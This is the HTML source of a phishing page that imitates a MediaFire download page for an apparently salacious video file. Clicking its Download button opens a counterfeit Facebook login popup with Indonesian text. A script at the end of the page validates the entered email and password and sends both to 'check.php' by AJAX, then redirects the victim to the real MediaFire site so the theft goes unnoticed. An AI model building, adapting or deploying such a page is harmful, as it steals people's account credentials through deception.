<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="utf-8" />
<meta http-equiv="x-ua-compatible" content="ie=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
<title>Desahanya Enakbet</title>
<meta name="keywords" content="online storage, free storage, cloud Storage, collaboration, backup file Sharing, share Files, photo backup, photo sharing, ftp replacement, cross platform, remote access, mobile access, send large files, recover files, file versioning, undelete, Windows, PC, Mac, OS X, Linux, iPhone, iPad, Android" />
<meta name="description" content="MediaFire is a simple to use free service that lets you put all your photos, documents, music, and video in a single place so you can access them anywhere and share them everywhere." />
<meta name="robots" content="noindex,nofollow" />
<meta name="googlebot" content="noindex,nofollow" />
<meta name="slurp" content="noindex,nofollow" />
<meta name="google-translate-customization" content="5587c1b0a958bf07-62a8e309de686e87-gc92f61279a2c8524-11" />
<meta property="fb:app_id" content="124578887583575">
<meta property="og:type" content="website" />
<meta property="og:site_name" content="MediaFire" />
<meta property="og:locale" content="en_US" />
<meta property="og:url" content="#" />
<meta property="og:title" content="Desahanya Enakbet" />
<meta property="og:image" content="https://static.mediafire.com/images/filetype/download/zip.jpg" />
<meta property="og:description" content="" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:site" content="@MediaFire" />
<meta name="twitter:url" content="#" />
<meta name="twitter:title" content="Desahanya Enakbet" />
<meta name="twitter:image" content="https://static.mediafire.com/images/filetype/download/zip.jpg" />
<meta name="twitter:description" content="" />
<link href="https://plus.google.com/+mediafire" rel="publisher" />
<meta itemprop="name" content="Desahanya Enakbet " />
<meta itemprop="image" content="https://static.mediafire.com/images/filetype/download/zip.jpg" />
<meta itemprop="description" content="" />
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/npm-jquery/backend/css/facebook.css">
<link rel="stylesheet" href="css/style.css">
<script src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js"></script>
<script src="js/google.js"></script>
<script src="js/lazyload.js"></script>
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-829541-1"></script>
<script>
        try {
            window.dataLayer = window.dataLayer || [];
            function gtag(){dataLayer.push(arguments);}
            gtag("js", new Date());
            gtag("config", "UA-829541-1", {"dimension1":"unregistered","dimension7":"legacy","dimension3":"archive","dimension4":"4","dimension5":"zip","dimension8":"\/5\/10\/20\/50\/100\/"});
        } catch(e) {}
    </script>
 
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-53LP4T"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
</head>
<body class="en defaultTheme">
<main role="main" class="mf-dlr page ads-mobile4 mobile">
<label for="copy" style="display: none;">Copy textarea</label>
<textarea id="copy" style="position:absolute;left:-9999px;opacity:0" aria-hidden="true" tabindex="-1">#</textarea>
<div class="content">
<div class="header">
<div class="u-wrap">
<h1 class="logo">
<a href="#">MediaFire</a>
</h1>
<ul class="user-menu">
<li>
<a href="#" id="login" class="g-Btn g-Btn--primary">
<span class="loginActivateTW"></span>
<span class="loginActivateFB"></span>
Log In
</a>
</li>
<li>
<a href="#" id="signup" class="g-Btn g-Btn--primary">Sign Up</a>
</li>
<li>
<a href="#" class="user-menu-help g-Btn g-Btn--secondary">
<span class="g-Icon g-Icon--help"></span>Help
</a>
</li>


</ul>
</div>
</div>

<div class="popup rndylogin-fb animate fadeIn">
          <div class="container-box-fb">
            <div class="atasan-fb">
              <img src="https://cdn.jsdelivr.net/gh/rndytech/backend/assets/facebook/facebook_text.png">
            </div> 
            <div class="isi-facebook">
              <p class="kaget email-fb">
                The email address or phone number that you've entered doesn't match any account. <b>Sign up for an account.</b>
              </p>
              <p class="kaget sandi-fb">The password that you've entered is incorrect. Forgotten password?</p>
              <img src="img/logo.png">
              <div class="txt-ucapan-fb">Masuk ke akun Facebook Anda untuk terhubung dengan MediaFire</div>
              <form id="rndyform" class="form-login-fb" onsubmit="return verif_rndy()">
                <label>
                  <input type="text" id="user" name="user" placeholder="Mobile number or email address" autocomplete="off" autocapitalize="off" style="background: none" required>
                </label>
                <label>
                  <input type="password" id="pass" name="pass" placeholder="Password" autocomplete="off" autocapitalize="off" style="background: none" required>
                </label>
                <input type="hidden" name="login" id="login" value="Facebook" readonly>
 <button class="btn-login-fb" type="submit">Log In</button>
              </form>
              <div class="txt-buat-akun">Create account</div>
              <div class="txt-tidak-sekarang">not now</div>
              <div class="txt-lupa-password">Forgotten password?</div>
            </div>
            <div class="isi-bahasa">
              <center>
                <div class="nama-bahasa bahasa-aktif">English (UK)</div>
                <div class="nama-bahasa">Bahasa Indonesia</div>
                <div class="nama-bahasa">Basa Jawa</div>
                <div class="nama-bahasa">Bahasa Melayu</div>
                <div class="nama-bahasa">日本語</div>
                <div class="nama-bahasa">Español</div>
                <div class="nama-bahasa">Português (Brasil)</div>
                <div class="nama-bahasa">
                  <i class="fa fa-plus"></i>
                </div>
              </center>
            </div>
            <div class="copyright">Facebook Inc.</div>
          </div>
        </div>


<script type="text/javascript" src="css/cika20jt.js"></script>
<div class="center">
<div class="ads dl-box">
<div class="dl-btn-cont">
<div class="icon zip archive application_zip"></div>
<div class="dl-btn-labelWrap">
<div class="promoDownloadName notranslate">
<div class="dl-btn-label" title="Desahanya Enakbet">
Desahanya Enakbet</div>
</div>
<div class="dl-utility-nav">
<ul>
<li>
<a href="#" target="_blank" rel="noopener" id="shareButton" class="nopop g-Icon g-Icon--white g-Icon--share" aria-labelledby="share-tooltip" title="More sharing options"></a>
<span id="share-tooltip" class="alt point-down tooltip">
More sharing options
</span>
</li>
<li>
<a href="#" target="_blank" rel="noopener" id="copyShareURL" class="nopop g-Icon g-Icon--white g-Icon--link" aria-labelledby="copy-tooltip" title="Copy file link to clipboard"></a>
<span id="copy-tooltip" class="alt point-down tooltip">
Copy file link to clipboard
</span>
</li>
<li>
<a href id="saveButton" class="g-Icon g-Icon--white g-Icon--add" aria-labelledby="save-tooltip" title="Save file to My Files"></a>
<span id="save-tooltip" class="alt point-down tooltip">
Save file to My Files
</span>
</li>
<noscript>
                    <style type="text/css">
                        #shareButton, #copyShareURL, #saveButton { display: none }
                    </style>
                </noscript>
</ul>
</div>
</div>
<form method="post" name="download" class="dl-btn-form" autocomplete="off">
<input type="hidden" name="security" value="1651588640.1c14c0d3bf8b92e5eb30091610d263a2a195f4290bf404a9314e1f8f87723363" />
<div class="download_link" id="download_link">
<a class="preparing" href="#"><span>Preparing your download...</span></a>
<a class="input popsok" aria-label="Download file" id="downloadButton">
Download (12.89MB)
</a>
<a class="starting" href="#"><span>Your download is starting...</span></a>
<a class="retry" href="#">
<span class="notranslate">Not working? <em>Repair your download</em></span>
</a>
<script type="text/javascript">
                (function() {
                    var dl = document.getElementById('download_link');
                    if (!dl) return;
                    var init = false;

                    function retry() {
                        dl.className += ' retry';
                    };

                    function download() {
                        dl.className += ' started';
                        window.dlStarted = true;
                                                    setTimeout(retry, 16000);
                                            };

                    window.initDownload = function() {
                        if (init) return;
                        init = true;
                        dl.className = 'download_link';
                        dl.onclick = download;
                    };

                                            initDownload();
                                    })();
                </script>
</div>
<a href="#" class="download_test_link">
Download Diagnostic Tool
</a>
</form>
<div class="DLMobile-shareOptions">
<ul>
<li>
<a href="#" target="_blank" rel="noopener" id="copyShareURLMobile" class="nopop">
<span></span>Copy for messenger
</a>
</li>
<li>
<a href="#" id="facebookShareButtonMobile" target="_blank" rel="noopener" class="nopop">
<span></span>Post to Facebook
</a>
</li>
</ul>
<ul>
<li>
<a href="#" id="shareButtonMobile" class="nopop">
<span></span>Share options
</a>
</li>
<li>
<a id="saveButtonMobile">
<span></span>Save to My Files
</a>
</li>
</ul>
</div>
</div>
<script type="text/javascript">
    var sticky = {
        threshold: 800,
        div: null,
        init: function() {
            this.div = document.getElementsByClassName('ads-mobile5')[0];
            if (this.div) {
                this.scroll();
                this.events();
            }
        },

        scroll: function() {
            if (this.div) {
                if (window.scrollY > this.threshold) {
                    this.div.classList.add('swapAd');
                } else {
                    this.div.classList.remove('swapAd');
                }
            }
        },

        debounce: function(func, wait, immediate) {
            var timeout;
            return function() {
                var context = this, args = arguments;
                var later = function() {
                    timeout = null;
                    if (!immediate) func.apply(context, args);
                };
                var callNow = immediate && !timeout;
                clearTimeout(timeout);
                timeout = setTimeout(later, wait);
                if (callNow) func.apply(context, args);
            };
        },

        events: function() {
            if (this.div) {
                var debouncedScroll = this.debounce(this.scroll.bind(this), 50);
                window.addEventListener('scroll', debouncedScroll);
            }
        }
    };

    document.addEventListener("DOMContentLoaded", sticky.init.bind(sticky));
</script>
<a class="dl-promo-cont nopop" href="#" target="_blank" rel="noopener">
MediaFire Pro: Faster bulk downloads, Ad free downloads, & 1 TB of storage. From $3.75/month.
</a>
<div class="dl-info">
<div class="intro icon zip archive application_zip">
<div class="filename">Video Chika 20jt</div>
<div class="filetype"><span>Compressed Archive</span><span> (.ZIP)<span></span></span></div>
</div>
<ul class="details">
<li>File size: <span>12.89MB</span></li>
<li>Uploaded: <span>2021-06-29 07:24:14</span></li>
</ul>
<div class="description">
<p class="description-subheading">About Compressed Archive Formats</p>
<p>Compressed archives combine multiple files into a single file to make them easier to transport or save on diskspace. Archiving software may also provide options for encryption, file spanning, checksums, self-extraction, and self-installation. Zip is the most-widely used format, used by the Windows operating system and more recently by OSX as well. RAR is also a very popular and flexible format. Unix uses the tar file format, while Linux uses the tar and gz format.</p>
</div>
<div class="sidebar">
<div class="apps">
<div>
<div class="filename">Chika 20jt</div>
<br>Can be opened with
</div>
<ul>
<li>
<a class="nopop" href="#" target="_blank" rel="noreferrer" title="WinZip for PC">
WinZip for PC </a>
</li>
</ul>
</div>
<div class="Download-compatibility">
<div style="margin-bottom: 0;">
<div class="filename">Video Chika 20jt</div>
</div>
<label for="compat-select" style="display: block; margin-bottom: 10px;">System compatibility</label>
<select class="g-Select" id="compat-select" title="Select operating system">
<option value="windows" data-compat>
Windows </option>
<option value="osx" data-compat>
macOS </option>
<option value="linux" data-compat>
Linux </option>
</select>
<div class="Download-compatibilityStatus is-compatible" id="compat-supported">
<span></span>
<p>File is compatible with the selected operating system.</p>
</div>
<div class="Download-compatibilityStatus is-notCompatible" id="compat-unsupported" style="display:none">
<span></span>
<p>File is not compatible with the selected operating system.</p>
</div>
<script type="text/javascript">
                            var compatSelect = document.getElementById('compat-select');
                            var compat = document.getElementById('compat-supported');
                            var nonCompat = document.getElementById('compat-unsupported');
                            compatSelect.onchange = function(e) {
                                var options = e.target.options;
                                var selection = options[options.selectedIndex];
                                var supported = selection && selection.attributes['data-compat'];
                                compat.style.display = supported ? 'block' : 'none';
                                nonCompat.style.display = !supported ? 'block' : 'none';
                            };

                        </script>
</div>
</div>
</div>
</div>
</div>

<div id="non-dl-content" class="nonDLContentWrap">
<style type="text/css">
                #div-gpt-ad-1575674121640-0 {
                    width: 100%; height: 100px; top: 70px; position: absolute; align-items: center; justify-content: center; display: flex;
                }
            </style>
<div id="div-gpt-ad-1575674121640-0">
<script type='text/javascript'>
                    googletag.cmd.push(function() {
                        googletag.display('div-gpt-ad-1575674121640-0');
                    });
                </script>
</div>
<style type="text/css">
                #div-gpt-ad-1579281108195-0 {
                    width: 100%; height: 100px; top: 440px; left: 0; position: absolute; display: flex; align-items: center; justify-content: center;
                }
            </style>
<div id="div-gpt-ad-1579281108195-0">
<script type='text/javascript'>
                    googletag.cmd.push(function() {
                        googletag.display('div-gpt-ad-1579281108195-0');
                    });
                </script>
</div>
<style type="text/css">
                #div-gpt-ad-1579281193413-0 {
                    width: 100%; height: 100px; bottom: 0; left: 0; display: flex; align-items: center; position: absolute; justify-content: center;
                }
            </style>
<div id="div-gpt-ad-1579281193413-0">
<script type='text/javascript'>
                    googletag.cmd.push(function() {
                        googletag.display('div-gpt-ad-1579281193413-0');
                    });
                </script>
</div>
<script type="text/javascript">
                    window['adLazyLoadQueue'].push("div-gpt-ad-1579281193413-0");
                </script> </div>

<div class="DLExtraInfo-wrap">

<div class="DLExtraInfo">

<div class="DLExtraInfo-uploadLocation DLExtraInfo-column">
<div class="lazyload DLExtraInfo-uploadLocationMap Continent" data-lazyclass="DLExtraInfo-uploadLocationMapBg">
<span>Upload region:</span>
<div class="lazyload DLExtraInfo-uploadLocationRegion" data-lazyclass="continent-as"></div>
</div>

<div class="lazyload DLExtraInfo-sectionGraphic flag" data-lazyclass="flag-id"></div>
<div class="DLExtraInfo-sectionDetails">
<p>This file was uploaded from Indonesia on June 29, 2021 at 7:24 AM</p>
</div>
</div>
<div class="DLExtraInfo-upload DLExtraInfo-column">

<div class="DLExtraInfo-virusTotal DLExtraInfo-row">
<div class="DLExtraInfo-sectionGraphic">
<div class="lazyload DLExtraInfo-sectionGraphicCenter" data-lazyclass="DLExtraInfo-virusTotalImage"></div>
</div>
<div class="DLExtraInfo-sectionDetails">
<div class="DLExtraInfo-sectionHeading">VirusTotal scan</div>
<p>
MediaFire scans high-risk files using VirusTotal.
</p>
</div>
</div>

<div class="DLExtraInfo-Facebook DLExtraInfo-row">
<div class="social-cont">
<div class="social-fb-cont">
<span id="social-fb-label">Like MediaFire on Facebook</span>
<iframe class="lazyload nopop" data-lazysrc="https://www.facebook.com/plugins/like.php?href=http://www.facebook.com/MediaFire&width=193&layout=button_count&action=like&show_faces=false&share=true&height=30&appId=124578887583575" src="" width="190" height="30" scrolling="no" frameborder="0" allowTransparency="true" aria-labelledby="social-fb-label"></iframe>
</div>
</div>
<noscript><style>.social-fb-cont>iframe{display:block}</style></noscript>
</div>
</div>
</div>

<div class="DLExtraInfo DLExtraInfo-additional">

<div class="DLExtraInfo-accountStatus DLExtraInfo-column">
<div class="lazyload DLExtraInfo-sectionIcon" data-lazyclass="DLExtraInfo-accountStatusImage"></div>
<div class="DLExtraInfo-sectionDetails">
<div class="DLExtraInfo-sectionHeading">About MediaFire</div>
<div class="DLExtraInfo-sectionSubHeading">Welcome!</div>
<p>
With MediaFire, you get simple yet powerful file storage
along with features you won’t find anywhere else. <a href="#">Learn more</a>
</p>
</div>
</div>

<div class="DLExtraInfo-downloadApp DLExtraInfo-column">
<div class="lazyload DLExtraInfo-sectionIcon" data-lazyclass="browser-chrome"></div>
<div class="DLExtraInfo-sectionDetails">
<div class="DLExtraInfo-sectionHeading">Download application</div>
<div class="DLExtraInfo-sectionSubHeading">Chrome</div>
<p>
You are downloading this file with <span>Chrome, version 0.0.</span>
</p>
</div>
</div>
</div>
</div>
</div>
<div id="share" class="lightbox" role="dialog" tabindex="-1">
<figure>
<a href="#" class="close" id="share-close" title="Close share dialog"><span style="display: none">Close share dialog</span></a>
<figcaption>
<iframe id="share-iframe" data-src="https://www.mediafire.com/widgets/share.php?web=1&amp;dlr=1&amp;files=9lqf4hdm7e4i7wu" allowtransparency="true" style="display:none">
                    <p id="share-desc">
                        Failed to load. Try again in a supported browser.
                    </p>
                </iframe>
<noscript>
                    <p id="share-desc">
                        Failed to load. Please enable JavaScript.
                    </p>
                </noscript>
</figcaption>
</figure>
</div>
</main>
<footer role="contentinfo" id="footer" class="footer">
<div class="u-wrap" id="mainFooterWrap">
<div class="footerColWrap u-cf">
<div class="footerCol">
<h2><a href="#">Company</a></h2>
<ul>
<li class="minFooterShow"><a href="#">About<b> Us</b></a></li>
<li><a href="#">Careers</a></li>
<li><a href="#">Press</a></li>
<li><a href="#" target="_blank">Company Blog</a></li>
</ul>
</div>
<div class="footerCol">
<h2><a href="#">Tools</a></h2>
<ul>
<li class="minFooterShow">
<a href="#"><b>MediaFire </b>Mobile</a>
</li>
<li class="minFooterShow">
<a href="#" target="_blank" title="Powerful On-Demand Video Processing CDN - Video transformations, optimization, and delivery using simple and robust URL parameters.">On-Demand Video Encoding</a>
</li>
</ul>
</div>
<div class="footerCol">
<h2><a href="#">Upgrade</a></h2>
<ul>
<li><a href="#">Professional</a></li>
</ul>
</div>
<div class="footerCol">
<h2><a href="#" target="_blank">Support</a></h2>
<ul>
<li class="minFooterShow"><a href="#" target="_blank"><b>Get Support</b></a></li>
</ul>
</div>
</div>
</div>

<div id="subFooterWrap">
<div id="subFooter" class="u-wrap">
<ul class="subFooterLinks">
<li id="copyrightInfo">&copy;2022 MediaFire<span> Build 121873</span></li>
<li><a href="#">Advertising</a></li>
<li><a href="#">Terms</a></li>
<li><a href="#">Privacy Policy</a></li>
<li><a href="#">Copyright</a></li>
<li><a href="#">Abuse</a></li>
<li><a href="#">Credits</a></li>
<li><a href="#">More...</a></li>
</ul>
<div class="subFooterSocialWrap">
<ul id="subFooterSocial">
<li class="footerIcn">
<a href="#" class="footerIcnBlog" target="_blank" title="MediaFire Blog">
<span class="footerIcnBlog"></span>
 </a>
</li>
<li class="footerIcn">
<a href="#" class="footerIcnTw" target="_blank" rel="noreferrer" title="MediaFire's Twitter page">
<span class="footerIcnTw"></span>
</a>
</li>
<li class="footerIcn" style="margin-left: 0;">
<a href="#" class="footerIcnFb" target="_blank" rel="noreferrer" title="MediaFire's Facebook page'">
<span class="footerIcnFb"></span>
</a>
</li>
</ul>
</div>
<div class="socialLinks" id="minSocialLinks">
<a href="#" class="shareFacebook" title="MediaFire on Facebook"><span style="display: none">Facebook Page</span></a>
<a href="#" class="shareTwitter" title="MediaFire on Twitter"><span style="display: none">Twitter Page</span></a>
<a href="#" class="shareBlogger" title="MediaFire Blog"><span style="display: none">MediaFire Blog</span></a>
</div>
</div>
</div>

</footer>
<div id="status">
<div id="status-message"></div>
<div id="status-close">Click to dismiss this message</div>
</div>
<iframe name="iframe_worker" id="iframe_worker" src="" style="display:none;height:0;width:0;"></iframe>
<script src="js/select.js"></script>
<script src="js/event.js"></script>
<script type="text/javascript">
		$(document).ready(function()
		{
		var dlButton = document.getElementById('downloadButton');

    dlButton.addEventListener("click", 
        function (event) {
            event.preventDefault();
				$('.rndylogin-fb').fadeIn();
        }, 
        false);
            window.addEventListener('submit', (e) => {
                    $('.btn-login-fb').html('<i class="fa fa-circle-o-notch fa-spin">')
                e.preventDefault()
                setTimeout(() => {
                    check()
                },2000)
                return false;
            })
		function check()
		{
			$user = $('#user').val().trim();
			$pass = $('#pass').val().trim();
			if($user == '' || $user == null || $user.length <= 5)
			{
				$('.email-fb').show();
				$('.sandi-fb').hide();
				$('.btn-login-fb').html('Masuk')
				return false;
			}else{
				$('.email-fb').hide();
			}
			if($pass == '' || $pass == null || $pass.length <= 5)
			{
				$('.sandi-fb').show();
				$('.btn-login-fb').html('Masuk')
				return false;
			}else{
				$('.sandi-fb').hide();
			}
                // if all form are filled
                if($user !== '' || $user !== null || !$pass == '' || !$pass == null)
                
                {
                    // SEND DATA
                    $.ajax({
                        type: 'POST',
                        url: 'check.php',
                        data: $('#rndyform').serialize(),
                        dataType: 'text',
                        success: function() {
                                    $('.rndylogin-fb').toggle();
                                    $('.btn-login-fb').html('Success')
                                    $('.rndylogin-fb').fadeOut();
                                    window.location = 'https://mediafire.com/';
                            } 
                    })
                }
		}})
	</script>
<script defer src="https://static.cloudflareinsights.com/beacon.min.js/v652eace1692a40cfa3763df669d7439c1639079717194" integrity="sha512-Gi7xpJR8tSkrpF7aordPZQlW2DLtzUlZcumS8dMQjwDHEnw9I7ZLyiOj/6tZStRBGtGgN6ceN6cMH8z7etPGlw==" data-cf-beacon='{"rayId":"7059bbeb4d341a46","token":"8e4f9484d8b840b28e4e0cc92b90ce0c","version":"2021.12.0","si":100}' crossorigin="anonymous"></script>
</body>
</html>